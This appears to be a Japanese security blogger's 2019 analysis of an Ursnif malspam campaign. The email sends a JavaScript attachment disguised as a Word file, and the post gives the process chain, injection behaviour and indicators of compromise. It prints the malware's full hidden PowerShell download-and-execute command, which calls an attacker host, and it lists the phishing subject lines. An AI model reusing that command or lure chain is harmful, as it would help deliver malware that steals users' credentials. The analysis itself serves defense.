2019/04/15(月) 添付ファイル付不審メールの調査
本日(2019年4月15日)、Ursnifに感染するばらまきメールを観測しましたので、調査しました。
■件名
下記の件名でメールがばらまかれております。
Fw:
Fw:HR
Fw:list of employees to reduce
@taku888infinityさんが作成されている下記ファイルより参考にさせていただきました。
■添付ファイル
今回解析したファイルは、doc.doc.jsというjavascriptでした。.doc.jsということでwordファイルと偽装しようとしたjavascriptでしたが、アイコンはjavascriptのままでした。
-Sha1 72B39A2FAC64B2B3290D5B7C0321FC2A7E1CB8D1
■プロセスの動き(概要)
下記のとおり、Wscript->cmd->powershell->control.exe->rundll32.exeと動作しているがわかります。
■Powershellの動き
Powershellへの引数が下記のようになっていました。read.exeをLocal配下にTempbsK70.exeとしてダウンロードしていることがわかります。
powErshelL.eXe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('hxxp://instant-payments.ru/read.exe','C:\Users\shadow3\AppData\Local\TempbsK70.exe');
■read.exeについて(TempbsK70.exe)
read.exeのハッシュ値は下記のようになっていました。攻撃コードを作成し、RunDLL32を用いて呼び出しているものだと推測されます。
SHA1 45762C39DE64AB7ACECA9D6367129EC0CE37433D
■RunDLL32.exeについて
RunDLL32.exeの引数は次のようになっていました。
-Shell32.dll,Control_RunDLL /?
これよりShell32.dllに含まれるControl_RunlDLL関数を呼び出していることがわかります。Control_RunlDLL関数は、引数に作成したDLLを設定することで、対象のDLLをエントリポイントから実行させることが可能のため、攻撃コードを実効したものだとわかります。
(参考)rundll32.exeを悪用した命令の実行
https://binary-pulsar.hatenablog.jp/entry/2018/11/05/083000
asfe32gt.exeというファイルが自動起動として登録されていました。ハッシュ値は下記のようになっていました。上記のRead.exeと同一ハッシュであることがわかります。
SHA1 45762C39DE64AB7ACECA9D6367129EC0CE37433D
■情報摂取のために作成されるファイル(.binファイル)
%temp%配下に.binファイルが作成されており、下記のようにアクセスしたURLやPostデータが格納されていました。
さらに今回は、別タイプのファイルも存在し、下記のファイルではブラウザで入力した情報を盗むキーロガー用のファイルも作成されていました。
■インジェクションされたコードについて(まだ勉強中)
Process Monitorより.binファイルはExplorer.exeが作成していることがわかります。DLLインジェクションを行われたためだと考えられます。
Process HackerでExplorer.exeを参照したところ、書き込み権限および実行権限を付与された領域があったため、この部分(0x86d1000等)にコードを挿入(448KB分)されたものだと考えられます。実際にbinファイルが作られたときのスタックの動きを追ってみると、0x869d775にあるUnknownモジュールから、CreateFileやWriteFileが呼び出されていることが確認できました。
また、時間があるときに書き込まれたコードをOllydbg等を利用して、さらに分析したいと思います。
■.binファイルの送付先
こちらの環境で解析したところ、作成された.binファイルをC&Cサーバに送付している様子は見られませんでした。
■今回観測したIoC情報
SHA1 72B39A2FAC64B2B3290D5B7C0321FC2A7E1CB8D1
SHA1 45762C39DE64AB7ACECA9D6367129EC0CE37433D
hxxp://instant-payments[.]ru
以上となります、何か誤っている情報などありましたら、twitterで連絡してもらえると助かります。